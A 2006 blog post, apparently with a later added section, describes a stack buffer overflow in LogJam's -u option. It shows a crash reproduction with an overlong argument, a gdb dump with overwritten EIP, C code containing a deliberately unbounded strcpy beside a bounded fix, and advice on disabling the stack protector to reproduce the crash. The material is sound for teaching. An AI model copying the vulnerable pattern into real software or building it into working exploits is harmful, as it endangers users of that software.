2006-03-04 20:36:00
By Tim Brown
More bugs discovered during code audits... for example, I discovered that the -u parameter to LogJam is subject to a stack-based buffer overflow. It's purely hypothetical since you'd only exploit yourself, but probably fun to play with whilst learning more about how such attacks work.
user@host:~$ ulimit -c 100000
user@host:~$ logjam -u `perl -e "print 'A'x1024"`
Password:
Segmentation fault (core dumped)
user@host:~$ gdb logjam core
...
#0  0x41414141 in ?? ()
(gdb) info registers
eax            0x0          0
ecx            0xb76f5ff4   -1217437708
edx            0xbf9e2f9c   -1080152164
ebx            0x41414141   1094795585
esp            0xbf9e3080   0xbf9e3080
ebp            0x41414141   0x41414141
esi            0x41414141   1094795585
edi            0x80dc118    135119128
eip            0x41414141   0x41414141
eflags         0x10286      66182
cs             0x73         115
ss             0x7b         123
ds             0x7b         123
es             0xc010007b   -1072693125
fs             0x0          0
gs             0x33         51
As you can see, EIP is clearly overwritten with 0x41414141 ("AAAA"), and so are the saved EBP, EBX and ESI: the copy of the -u argument ran past the end of its stack buffer, over the saved registers and the return address, so the function returned into data supplied on the command line.
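To show the pattern behind that register dump, here is a small added example (my own code, not LogJam's; the buffer name, its size of 32 bytes and the -u handling are assumptions chosen for illustration). set_user_unsafe() copies the argument into a fixed stack buffer with no length check, which is what produces the 0x41414141 crash above; set_user_safe() is the bounded version that refuses anything that does not fit rather than silently truncating it.

```c
#include <stdio.h>
#include <string.h>

#define USER_MAX 32   /* assumed size of the username buffer; illustrative only */

/* Vulnerable pattern: unbounded strcpy() into a fixed-size stack buffer.
 * An argument longer than USER_MAX-1 bytes overwrites whatever sits above
 * the buffer on the stack (saved EBX/ESI/EBP, then the return address),
 * which is why EIP ends up as 0x41414141 when the argument is all 'A's. */
int set_user_unsafe(const char *arg)
{
    char user[USER_MAX];
    strcpy(user, arg);            /* no bound: writes past 'user' on long input */
    return (int)strlen(user);     /* bytes "accepted" (only meaningful if it fit) */
}

/* Hardened pattern: check the length against the real buffer size first
 * and copy exactly that many bytes plus the terminator.  Returns the
 * length copied, or -1 if the argument does not fit.  Refusing is better
 * than strncpy()-style truncation, which can leave 'out' unterminated. */
int set_user_safe(const char *arg, char *out, size_t outlen)
{
    size_t n = strlen(arg);
    if (outlen == 0 || n >= outlen)
        return -1;                /* too long for the buffer: reject it */
    memcpy(out, arg, n + 1);      /* n bytes plus the NUL, never past outlen */
    return (int)n;
}

/* Constructed input mirroring the blog's test case: 1024 'A' bytes. */
int demo_long_input_rejected(void)
{
    static char longarg[1025];
    char user[USER_MAX];
    memset(longarg, 'A', sizeof longarg - 1);
    longarg[sizeof longarg - 1] = '\0';
    return set_user_safe(longarg, user, sizeof user);   /* expect -1 */
}

int main(int argc, char **argv)
{
    char user[USER_MAX];
    int rc;

    if (argc != 3 || strcmp(argv[1], "-u") != 0) {
        fprintf(stderr, "usage: %s -u <username>\n", argv[0]);
        return 2;
    }
    rc = set_user_safe(argv[2], user, sizeof user);
    printf("bounded copy:   %s\n", rc < 0 ? "rejected, argument too long" : user);
    /* The unbounded copy runs last: with a long -u argument this is where
     * the saved return address is smashed and the process crashes on return. */
    printf("unbounded copy: %d bytes\n", set_user_unsafe(argv[2]));
    return 0;
}
```

Run it as `./a.out -u $(perl -e 'print "A"x1024')` to reproduce the crash. Two caveats when trying this on a current system: gcc's default stack protector will turn the silent EIP overwrite into a "stack smashing detected" abort before the function returns, so build with -fno-stack-protector (and -no-pie if you want the old fixed addresses), and on x86-64 a return to 0x4141414141414141 is a non-canonical address, so the fault is raised at the ret instruction and RIP will not read as 0x41..41 the way EIP does in the 32-bit dump above.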
Update: This issue evoked lively debate over on LiveJournal.
Mood: random()
Music: Nothing playing right now